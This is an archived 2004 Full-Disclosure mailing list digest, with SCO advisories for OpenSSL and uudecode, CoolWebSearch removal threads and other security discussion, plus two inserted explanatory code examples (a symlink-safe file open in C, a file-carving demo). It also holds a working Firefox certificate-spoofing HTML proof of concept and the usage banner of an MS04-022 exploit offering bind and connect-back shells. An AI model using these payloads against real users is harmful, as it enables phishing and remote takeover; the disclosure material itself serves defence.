        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0079 to this issue.

        CERT Vulnerability Note VU#465542
        OpenSSL does not properly handle unknown message types

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0081 to this issue.

        CERT Vulnerability Note VU#484726
        OpenSSL does not adequately validate length of Kerberos ticket
        during SSL/TLS handshake.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2004-0112 to this issue.

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 OpenSSL distribution
        OpenServer 5.0.7 OpenSSL distribution

3. Solution

        The proper solution is to install the latest packages.

        SCOSA-2004.10 is an update of gwxlibs to version 1.3.3Db.

        A full list of changes to gwxlibs is at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.html#rn507mp_gwxlibs
        

4. OpenServer 5.0.6

        4.1 First install oss646c or later

        4.2 Location of oss646c

        ftp://ftp.sco.com/pub/openserver5/oss646c/

        4.3 Verification of oss646c

        (MD5 checksums for VOL.000.000 through VOL.000.010 omitted here; see
        the advisory at the SCO security resources URL in section 6.)

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.4 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.10

        4.5 Verification

        MD5 (VOL.000.000) = a85cf35c417903522392064aaa98f0a4
        MD5 (VOL.000.001) = d4383d6bc74bb6e873e7a4c8dfdc4e6b
        MD5 (VOL.000.002) = c5657b1358ef96177ae15fdcfec7132f
        MD5 (VOL.000.003) = 4c88ceb3502330b4c4d5e07ca7fc5214

        4.6 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to a directory

        2) Run the custom command, specify an install from media
        images, and specify the directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        The fixes are only available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        See the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://www.us-cert.gov/cas/techalerts/TA04-078A.html
                http://www.kb.cert.org/vuls/id/288574
                http://www.kb.cert.org/vuls/id/484726
                http://www.kb.cert.org/vuls/id/465542
                http://www.openssl.org/news/secadv_20040317.txt
                http://www.uniras.gov.uk/vuls/2004/224012/index.htm
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0079
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0112
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0081

        SCO security resources:
                http://www.sco.com/support/security/index.html

        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr890284 fz529412
        erg712603.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

8. Acknowledgments

        SCO would like to thank The U.K. National Infrastructure
        Security Co-ordination Centre (NISCC) and the OpenSSL team.

______________________________________________________________________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe

please_reply_to_securitysco.com
Date: Fri Jul 30 2004 - 15:27:38 CDT



______________________________________________________________________________

                        SCO Security Advisory

Subject: OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe
Advisory number: SCOSA-2004.12
Issue date: 2004 July 29
Cross reference: sr864864 fz527541 erg712054 CAN-2002-0178
______________________________________________________________________________

1. Problem Description

        The uudecode utility would create an output file without
        checking to see if it was about to write to a symlink or a
        pipe. If a user uses uudecode to extract data into open
        shared directories, such as /tmp, this vulnerability could
        be used by a local attacker to overwrite files or lead to
        privilege escalation.

        The Common Vulnerabilities and Exposures project (cve.mitre.org)
        has assigned the name CAN-2002-0178 to this issue.
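The missing check the advisory describes is easiest to see in code. This is an added example, not SCO's uudecode source: the output file is opened with O_NOFOLLOW and O_NONBLOCK and then fstat-checked to be a regular file, so a symlink or FIFO already sitting at the output path in a shared directory such as /tmp is refused instead of being followed or written through. open_decode_target and the demo_* helpers are constructed names; the self-checks create and remove a scratch directory under /tmp.

```c
/* Added example, not SCO's uudecode: create the decode output file so that a
 * symlink or FIFO already present at that path (e.g. planted in /tmp) is
 * refused rather than followed or written through. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns a descriptor open for writing on a regular file, or -1 with errno set.
 * O_NOFOLLOW makes open() fail on a symlink in the final path component,
 * O_NONBLOCK makes it fail (ENXIO) instead of hanging on a FIFO with no reader,
 * and the fstat check refuses any other non-regular file. The file is only
 * truncated after those checks, so nothing is clobbered before validation. */
int open_decode_target(const char *path, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW | O_NONBLOCK, mode);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;                 /* not a plain file: refuse it */
        return -1;
    }
    int fl = fcntl(fd, F_GETFL);        /* back to blocking mode for normal writes */
    if (fl < 0 || fcntl(fd, F_SETFL, fl & ~O_NONBLOCK) < 0 || ftruncate(fd, 0) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* --- constructed self-checks: scratch directory under /tmp, removed afterwards --- */
static int make_scratch(char *dir, size_t n)
{
    snprintf(dir, n, "/tmp/uudemo.XXXXXX");
    return mkdtemp(dir) != NULL;
}

/* Symlink at the output path pointing at a 4-byte victim file: must be refused
 * and the victim left intact. Returns 1 on the expected outcome. */
int demo_symlink_refused(void)
{
    char dir[64], victim[128], lnk[128];
    struct stat st;
    int ok = 0;
    if (!make_scratch(dir, sizeof dir))
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/out", dir);
    int vfd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (vfd >= 0 && write(vfd, "data", 4) == 4 && close(vfd) == 0
        && symlink(victim, lnk) == 0) {
        ok = open_decode_target(lnk, 0600) == -1
             && stat(victim, &st) == 0 && st.st_size == 4;
    }
    unlink(lnk); unlink(victim); rmdir(dir);
    return ok;
}

/* FIFO at the output path: must be refused without blocking. */
int demo_fifo_refused(void)
{
    char dir[64], fifo[128];
    int ok = 0;
    if (!make_scratch(dir, sizeof dir))
        return 0;
    snprintf(fifo, sizeof fifo, "%s/out", dir);
    if (mkfifo(fifo, 0600) == 0)
        ok = open_decode_target(fifo, 0600) == -1;
    unlink(fifo); rmdir(dir);
    return ok;
}

/* Plain path: must be created, writable, and left in blocking mode. */
int demo_regular_accepted(void)
{
    char dir[64], path[128];
    int ok = 0;
    if (!make_scratch(dir, sizeof dir))
        return 0;
    snprintf(path, sizeof path, "%s/out", dir);
    int fd = open_decode_target(path, 0600);
    if (fd >= 0) {
        int fl = fcntl(fd, F_GETFL);
        ok = fl >= 0 && !(fl & O_NONBLOCK) && write(fd, "ok", 2) == 2;
        close(fd);
    }
    unlink(path); rmdir(dir);
    return ok;
}
```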

2. Vulnerable Supported Versions

        System Binaries
        ----------------------------------------------------------------------
        OpenServer 5.0.6 /usr/bin/uudecode
        OpenServer 5.0.7 /usr/bin/uudecode

3. Solution

        The proper solution is to install the latest packages.

4. OpenServer 5.0.6

        4.1 First install oss646b or later

        4.2 Location of oss646c

        ftp://ftp.sco.com/pub/openserver5/oss646c/

        4.3 Verification of oss646c

        (MD5 checksums for VOL.000.000 through VOL.000.010 omitted here; see
        the advisory at the SCO security resources URL in section 6.)

        4.4 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.12

        4.5 Verification

        MD5 (VOL.000.000) = 53e8739812e5bfd7f3504d467e979019

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        4.6 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

5. OpenServer 5.0.7

        5.1 Location of Fixed Binaries

        ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.12

        The fixes are also available in SCO OpenServer Release 5.0.7
        Maintenance Pack 3 or later. See
        http://www.sco.com/support/update/download/osr507list.html.

        5.2 Verification

        MD5 (VOL.000.000) = 53e8739812e5bfd7f3504d467e979019

        MD5 (507mp3_vol.tar) = c927aefdd50b50aca5d29e08c1562aec

        md5 is available for download from
                ftp://ftp.sco.com/pub/security/tools

        5.3 Installing Fixed Binaries

        Upgrade the affected binaries with the following sequence:

        1) Download the VOL* files to the /tmp directory

        2) Run the custom command, specify an install from media
        images, and specify the /tmp directory as the location of
        the images.

        Or see the Maintenance Pack 3 Release and Installation Notes at

        ftp://ftp.sco.com/pub/openserver5/507/mp/mp3/osr507mp3.txt

6. References

        Specific references for this advisory:
                http://www.aerasec.de/security/index.html?id=ae-200204-033&lang=en
                http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0178

        SCO security resources:
                http://www.sco.com/support/security/index.html
        SCO security advisories via email
                http://www.sco.com/support/forums/security.html

        This security fix closes SCO incidents sr864864 fz527541
        erg712054.

7. Disclaimer

        SCO is not responsible for the misuse of any of the information
        we provide on this website and/or through our security
        advisories. Our advisories are a service to our customers
        intended to promote secure installation and use of SCO
        products.

______________________________________________________________________________


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Cool Web Search

From: John Kinsella (jlkthrashyour.com)
Date: Fri Jul 30 2004 - 20:01:41 CDT


On Fri, Jul 30, 2004 at 05:35:46PM -0400, Raj Varada wrote:
> Did you really mean "whatever can be done can be UNdone"?
> How about a format C:? (I haven't seen "unformat" in a very long time.)

Data can be read off a hard drive until it's been written over like
what...8 times IIRC? So, in theory, one "format C:" can be undone. ;)

John

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
RE: [Full-Disclosure] Cool Web Search

From: Steven Yu (sjyuucsd.edu)
Date: Fri Jul 30 2004 - 20:39:16 CDT


No unformat? Pfft... you obviously haven't read this article

http://www.computer.org/security/garfinkel.pdf

Steve

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Raj Varada
Sent: Friday, July 30, 2004 2:36 PM
To: Gregh
Cc: Disclosure Full
Subject: Re: [Full-Disclosure] Cool Web Search

Gregh wrote:

>Absolute and utter rot! I understand YOU may not be able to do it but it CAN
>be done. It is simple logic if you want to look at it another way - whatever
>can be DONE can be UNdone.
>

Did you really mean "whatever can be done can be UNdone"?
How about a format C:? (I haven't seen "unformat" in a very long time.)

R



 
RE: [Full-Disclosure] Cool Web Search

From: Dean Porter (deancenterpartners.com)
Date: Fri Jul 30 2004 - 21:07:06 CDT


Has anyone dealt with a similar thing called "searchweb2.com"?

This installed itself into two folders: "C:\Program Files\htm acid soap",
and "C:\Documents and Settings\All Users\Application Data\spam wipe that
audio" and then integrated itself into Internet Explorer as a "Search Bar",
that you can't turn off or on via the Right-Click (over the toolbars)
toolbars menu. It also sets the home page to point to
"http://searchweb2.com" and then sets the "page can't be found" to a page
with directory it - which reloads itself.

Neither Adware nor Spybot did anything about this. BHODemon doesn't see it
either (though I loaded BHODemon after I was hit by this).

It seems to have a "hidden" process that runs an executable from one of
these folders ("2 LOAD SETUP.exe" or "Once Grid.exe") which loads up two
hidden copies of IExplore; if you kill the IExplore processes, they relaunch.

I cleaned it off my system by booting in safe mode, removing the links from
HLM\Software\Microsoft\Windows\CurrentVersion\Run, cleaning with HiJackThis,
and then deleting the files in these folders.

Anyway, I was wondering if anyone else has dealt with this, what it actually
does (besides create a search bar and pop ads), and if I got it all.

Dean



 
[Full-Disclosure] Re: [OT] Hard drive recovery (WAS CoolWebSearch)

From: Andrew Farmer (andfarmteknovis.com)
Date: Fri Jul 30 2004 - 20:42:04 CDT


On 30 Jul 2004, at 18:01, John Kinsella wrote:
> On Fri, Jul 30, 2004 at 05:35:46PM -0400, Raj Varada wrote:
>> Did you really mean "whatever can be done can be UNdone"?
>> How about a format C:? (I haven't seen "unformat" in a very long
>> time.)
>
> Data can be read off a hard drive until it's been written over like
> what...8 times IIRC? So, in theory, one "format C:" can be undone. ;)

Well, DOS format doesn't overwrite anything but the metadata by default. So
that's pretty easy to undo as long as you have some idea of how data was laid
out.

If you're talking about overwritten data, though, you can't recover wiped
data without a cleanroom, specialized equipment, and a LOT of time -
especially with newer hard drives, as bit sizes shrink and on-drive error
correction and compression get more complex.


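Andrew's distinction above (a plain format rewrites only the filesystem metadata, an overwrite destroys the data) as an added example that is not part of the thread: a constructed disk image is "formatted" by zeroing only its directory region, and the files are then carved back out of the data region by signature scanning, the approach forensic recovery tools take; the same carve over an overwritten image finds nothing. The sector layout, directory format, signature table and sample files are all constructed for this demo and correspond to no real filesystem.

```python
"""Constructed demo: metadata-only "format" versus full overwrite.

The layout below (a 4-sector directory followed by sector-aligned file data)
is invented for the example; it is not FAT or any real on-disk format.
"""
import struct

SECTOR = 512
DIR_SECTORS = 4                    # constructed: sectors 0..3 hold the directory
ENTRY = struct.Struct("<16sII")    # name, start sector, length in bytes

# Constructed subset of the header/trailer pairs a carver matches on.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

# Constructed sample files: valid framing only, not real images or documents.
SAMPLE_FILES = [
    ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF constructed pixel data\xff\xd9"),
    ("report.pdf", b"%PDF-1.4\n1 0 obj << /Constructed true >> endobj\n%%EOF"),
]


def make_image(files):
    """Write files sector-aligned after the directory region and record
    (name, start_sector, length) for each in the directory. Returns bytes."""
    directory, data = bytearray(), bytearray()
    for name, content in files:
        start = DIR_SECTORS + len(data) // SECTOR
        directory += ENTRY.pack(name.encode().ljust(16, b"\x00"), start, len(content))
        data += content + b"\x00" * ((-len(content)) % SECTOR)
    directory += b"\x00" * (DIR_SECTORS * SECTOR - len(directory))
    return bytes(directory + data)


def list_directory(image):
    """What a filesystem driver sees: only files reachable through metadata."""
    files = []
    for off in range(0, DIR_SECTORS * SECTOR - ENTRY.size + 1, ENTRY.size):
        name, start, length = ENTRY.unpack_from(image, off)
        if length == 0:            # empty slot: end of directory
            break
        content = image[start * SECTOR:start * SECTOR + length]
        files.append((name.rstrip(b"\x00").decode(), content))
    return files


def quick_format(image):
    """Emulate the format Andrew describes: zero the metadata, keep data blocks."""
    return b"\x00" * (DIR_SECTORS * SECTOR) + image[DIR_SECTORS * SECTOR:]


def wipe(image):
    """Overwrite every sector, metadata and data alike."""
    return b"\x00" * len(image)


def carve(image):
    """Ignore the (possibly destroyed) metadata and scan the data region for
    known headers, cutting each hit at its matching trailer."""
    region = image[DIR_SECTORS * SECTOR:]
    found = []
    for kind, (head, tail) in SIGNATURES.items():
        pos = 0
        while (start := region.find(head, pos)) >= 0:
            end = region.find(tail, start + len(head))
            if end < 0:
                break              # header without trailer: truncated file
            end += len(tail)
            found.append((kind, region[start:end]))
            pos = end
    return found


def demo():
    """Run the scenarios and report what each recovery path yields."""
    image = make_image(SAMPLE_FILES)
    formatted = quick_format(image)
    return {
        "listed_before": [n for n, _ in list_directory(image)],
        "listed_after_format": [n for n, _ in list_directory(formatted)],
        "carved_after_format": [(k, len(c)) for k, c in carve(formatted)],
        "carved_after_wipe": carve(wipe(image)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```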


 
Re: [Full-Disclosure] Why should one buy (or not) an Appliance-based security gateway?

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 21:36:34 CDT


        [SNIP]

>
> An often overlooked issue is that the right choice for a clued and technically
> competent site is quite often a poor choice for a site that's not able to
> get its clue together. And there's a lot more of the latter than the former.
>

Which is also a reason some opt for another alternative and outsource
their security needs. There are some bad as well as some darned good
companies that do security monitor/warning for those orgs that find this
their best/better alternative.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.



 
Re: [Full-Disclosure] Stateful Packet Inspection

From: Ron DuFresne (dufresnewinternet.com)
Date: Fri Jul 30 2004 - 21:42:07 CDT


On Fri, 30 Jul 2004, Aaron Gray wrote:

> > Look into the iptables/netfilter docs, located here:
> > http://www.netfilter.org/documentation/index.html
> >
> > Connection tracking is explained here
> > http://www.sns.ias.edu/~jns/security/iptables/iptables_conntrack.html
>
> Thanks, I looked at netfilter a while ago but found nothing on SPI.
>

Google search: IPtables SPI ;;

http://www.google.com/search?q=IPtables+SPI&sourceid=mozilla-search&start=0&start=0

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.



 
[Full-Disclosure] Crack Microsoft Office encryption

From: Raj Mathur (rajulinux-delhi.org)
Date: Fri Jul 30 2004 - 22:25:08 CDT


Anyone have pointers to a free (open source) tool or methodology to
crack MS Office encrypted files? Both brute-force and smarter methods
are fine, smarter preferred, of course :)

I believe that Office encrypts files using RC4, is that correct?

Thanks,

-- Raju
--
Raj Mathur rajukandalaya.org http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5 0FEF C968 D0EF CC68 D17F
                      It is the mind that moves



 
[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit

From: pigrelax (pigrelaxyandex.ru)
Date: Sat Jul 31 2004 - 01:34:20 CDT


Hi all!

Microsoft Windows XP Task Scheduler (.job) Universal Exploit

* Tested on:
 * - Internet Explorer 6.0 (SP1) (iexplore.exe)
 * - Explorer (explorer.exe)
 * - Windows XP SP0, SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 * Win32/VC++ : cl HOD-ms04022-task-expl.c
 * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 * Shellcode:
 * 1 - Portbind shellcode
 * 2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port = 7777
 * [*] Generate file: expl.job
 *
 * C:\>
 *
 * start IE -> C:\
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows XP [Версия 5.1.2600]
 * (С) Корпорация Майкрософт, 1985-2001.
 *
 * C:\Documents and Settings\v.X\Рабочий стол>
 *

http://www.securitylab.ru/46820.html

……………………………
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
http://www.Maxpatrol.com



 
Re: [Full-Disclosure] Crack Microsoft Office encryption

From: Laurent LEVIER (llevierargosnet.com)
Date: Sat Jul 31 2004 - 02:16:35 CDT


Hi,

At 05:25 31/07/2004, Raj Mathur wrote:
>Anyone have pointers to a free (open source) tool or methodology to
>crack MS Office encrypted files? Both brute-force and smarter methods
>are fine, smarter preferred, of course :)
I know of no FREE one, but the series from Elcomsoft
(http://www.elcomsoft.com) works pretty well.

Hope this helps

Brgrds

Laurent LEVIER
Systems & Networks Security Expert, CISSP CISM



 
Re: [Full-Disclosure] Cool Web Search

From: Denis McMahon (denis.mcmahonntlworld.com)
Date: Sat Jul 31 2004 - 02:29:25 CDT


Dean Porter wrote:

> Has any one dealt with a similar thing called "searchweb2.com"?

Nope, but as a general fallback on Windows systems that have an ebd
that gives a DOS console:

1) identify the elements you need to remove on the live system.

2) boot the ebd and use the ebd tools to remove the unwanted items.

3) reboot without the ebd and check all the stuff you wanted to remove
has gone.

Denis



 
[Full-Disclosure] [Paper] Designing secure desktop operating system

From: Timo Sirainen (tssiki.fi)
Date: Sat Jul 31 2004 - 04:15:39 CDT


[possibly somewhat off-topic here, secureosprocontrol.fi can be used
for discussion about it]

I've written down some ideas on how I think it would be possible to
implement an easy-to-use and quite secure graphical user interface and
an operating system around it to make that possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested in hearing comments on why my ideas
simply wouldn't work with certain kinds of software or would be just too
much pain, or some other fundamental technical problem why this could
never work. Or, more positively, people who would be willing to
participate in a more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult for users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.



 
[Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Stephen Samuel (samuelbcgreen.com)
Date: Fri Jul 30 2004 - 22:16:12 CDT


Has this been posted to bugzilla????

E.Kellinis wrote:
> #########################################
> Application: Mozilla Firefox
> Vendors: http://www.mozilla.com
> Version: 0.9.1 / 0.9.2
> Platforms: Windows
> Bug: Certificate Spoofing (Phishing)
> Risk: High
> Exploitation: Remote with browser
> Date: 25 July 2004
> Author: Emmanouel Kellinis
> e-mail: mecipher(dot)org(dot)uk
> web: http://www.cipher.org.uk
> List : BugTraq(SecurityFocus)/ Full-Disclosure
> #########################################
>
>
> =======
> Product
> =======
> A popular Web browser, good alternative to IE and
> "The web browser" for linux machines,
> used to view pages on the World Wide Web.
>
> ===
> Bug
> ===
>
> Firefox has a caching problem, as a result of which someone can
> spoof a certificate of any website and use it as his/her own.
> The problem is exploited using onunload inside < body> and
> redirection using an Http-equiv Refresh metatag, document.write()
> and document.close().
>
> First you direct the redirection metatag to the website
> of which you want to spoof the certificate, then inside
> the < body> tag you add an onunload script so you can control
> the output inside the webpage with the spoofed certificate.
>
> After that you say to firefox, as soon as you unload this page
> close the stream; apparently the stream you close is
> the redirection website, you do that with
> document.close().
>
> Now you can write anything you want, you do that
> using document.write(). After writing the content of your choice
> you close the stream again. Usually firefox won't display your content,
> although if you check the source code you see it, so the last thing
> is to refresh the new page (do that using window.location.reload()),
> after that you have your domain name in the url field, your content
> in the browser and the magic yellow Lock on the bottom left corner.
> If you pass your mouse over it you will see displayed the name of
> the website whose certificate you spoofed, if you double click on it you
> will check full information of the certificate without any warning!
>
> You don't need to have SSL in your website! It will work with
> http.
>
> Additionally, using this bug malicious websites can bypass content
> filtering using SSL properties.
>
>
> =====================
> Proof Of Concept Code
> =====================
>
> < HTML>
> < HEAD>
> < TITLE>Spoofer< /TITLE>
> < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
> < /HEAD>
> < BODY
> onunload="
> document.close();
> document.writeln('< body onload=document.close();break;>
> < h3>It is Great to Use example's Cert!');
>
> document.close();
> window.location.reload();
> ">
> < /body>
>
>
> =========================================================
> *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> =========================================================

--
Stephen Samuel +1(604)876-0426 samuelbcgreen.com
                   http://www.bcgreen.com/~samuel/
    Powerful committed communication. Transformation touching
      the jewel within each person and bringing it to light.



 
Re: [Full-Disclosure] Shaft DDOS

mohrtemerity.net
Date: Fri Jul 30 2004 - 21:35:04 CDT


If you're gonna distribute source code, please ensure that it will compile
with a modern compiler!!

I understand that this may have been posted as a historical document (it
is dated from 2000), but really.

My amateurish C isn't advanced enough to fix everything in shaftnode, but
I did try to fix up genstuff & shaftmaster as best I could, and added a
makefile.

On Thu, 29 Jul 2004 phrackcox.net wrote:

> Shaft Denial of Service TOOL
>
> -japboy
>




 
[Full-Disclosure] Re: Appliance-based security gateway?

From: Eric Scher (ericschermac.com)
Date: Sat Jul 31 2004 - 07:48:10 CDT



====================================

A few colleagues and I started a discussion as to why
one should or shouldn't buy an appliance-based firewall,
ids/ips or other security appliance instead of installing
software on a server.

We thought about patching, performance, and other
reason for each option but I'd like to hear what other
people think.

I would really appreciate if you could share your
thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback

===================================

Ultimately, anything you place at the edge is going to be an appliance.
Maybe it'll be something by Cisco, perhaps a decommissioned desktop
running IP Tables, or even one of those fancy new boxes that's supposed
to make life easy for inexperienced admins. It's still essentially an appliance.

But what to use? That's really the essence of the question.

I saw a car show many years ago that was doing a segment on waxing,
and the host asked his guest what he recommends.
The guest replied: "Whatever you're actually going to use."
The best wax in the world won't protect your car if it sits on the shelf.
The worst wax WILL protect your car, if it's actually ON the car.

So for those admins that feel comfortable with something that requires a lot of
interaction, and have the time for it, then one of the more user intensive and complex
choices would be better.

If not, get something that will make your life easier, because a security solution only
secures you when it's being used.



 
Re: [Full-Disclosure] Security Web Site Hosting

From: CrYpTiC MauleR (crypticmaulerlinuxmail.org)
Date: Sat Jul 31 2004 - 08:22:40 CDT


----- Original Message -----
From: geierhogyros.de (Simon Richter)
Date: Fri, 30 Jul 2004 23:23:08 +0200
To: n30 <n30_listshotmail.com>
Subject: Re: [Full-Disclosure] Security Web Site Hosting

> Hi,
>
> > Any recommendations on site hosting services / Portal frameworks / site
> > builders...
>
> I've heard PHPNuke is pretty solid.
>
> Simon
>
> --
> GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4

PHP-Nuke? That is as bad as using IIS. PHP-Nuke has so many XSS, SQL Injection etc. vulns found all the time. Unless you want your site hacked, don't use that. If at all settling for a 'nuke' CMS, use Post-Nuke or CPG-Nuke.

Regards,
CM
--
______________________________________________
Check out the latest SMS services http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze



 
RE: [Full-Disclosure] [Paper] Designing secure desktop operating system

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sat Jul 31 2004 - 09:14:25 CDT


Fedora Core 2 from Red Hat is free and includes SELinux. Anyone been using
the test release of FC3?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Timo Sirainen
Sent: Saturday, July 31, 2004 4:16 AM
To: full-disclosurelists.netsys.com
Cc: secureosprocontrol.fi
Subject: [Full-Disclosure] [Paper] Designing secure desktop operating system



 
[Full-Disclosure] FullDisclosure: CWS removal tools

From: RandallM (randallmfidmail.com)
Date: Sat Jul 31 2004 - 09:30:05 CDT


I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunately,
the author was a student and it seems he can no longer support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes obsolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
are some other useful links: http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 



 
[Full-Disclosure] Cool Web Search Michael: take up the slack!

From: RandallM (randallmfidmail.com)
Date: Sat Jul 31 2004 - 09:58:57 CDT


Michael,
Very interesting that you would say you'd like to do battle. The below link
is a cached page of the author of CWShredder/HijackThis who states on his
web page (I could only get the cached version
http://64.233.167.104/search?sourceid=navclient-menuext&q=cache:http%3A//www.spywareinfo.com/~merijn/
Home page unreachable at the moment:
http://www.spywareinfo.com/~merijn/index.html):
 
>>>
June 28, 2004:Alright, this will be my last update for a while. I have a lot
of things going on that are not spyware-related in the next few months and
frankly I find these more important than the spyware-related issues. I'm
sorry if that offends you, but I simply don't have the time to do both at
the same time. I hope you'll understand.

July 1 2004, I will be graduating from the University of Utrecht and receive
my Masters Degree in Science (chemistry, specifically).
September 1 2004, I will start a second study at the same university. I'm
not sure what the English name for this study is (in Dutch it's
Informatiekunde) but it's in the Computer Sciences field.

Right now, my email inbox is overflowing with over 2700 emails which I can't
possibly answer all. These 2700 are two-thirds of about 4000, the remaining
one-third being spam and email viruses which I've already deleted. (For
god's sake people, get some decent antivirus protection, that's nearly 1300
emails from Windows systems infected with email spewing trojans.)
>>>>>>>>>>>>>>>>>>>>>>
 
I'm sure he would have variants and stuff to help you get started.

--__--__--

Message: 34

From: "Schmidt, Michael R." <Michael.SchmidtT-Mobile.com>

To: full-disclosurelists.netsys.com

Subject: RE: [Full-Disclosure] Cool Web Search

Date: Fri, 30 Jul 2004 14:10:30 -0700

I will take up arms to write a cleaner for it. I despise programs like this

Since we are talking about 30 variations does anyone know where a person can
get archived versions of all of these?

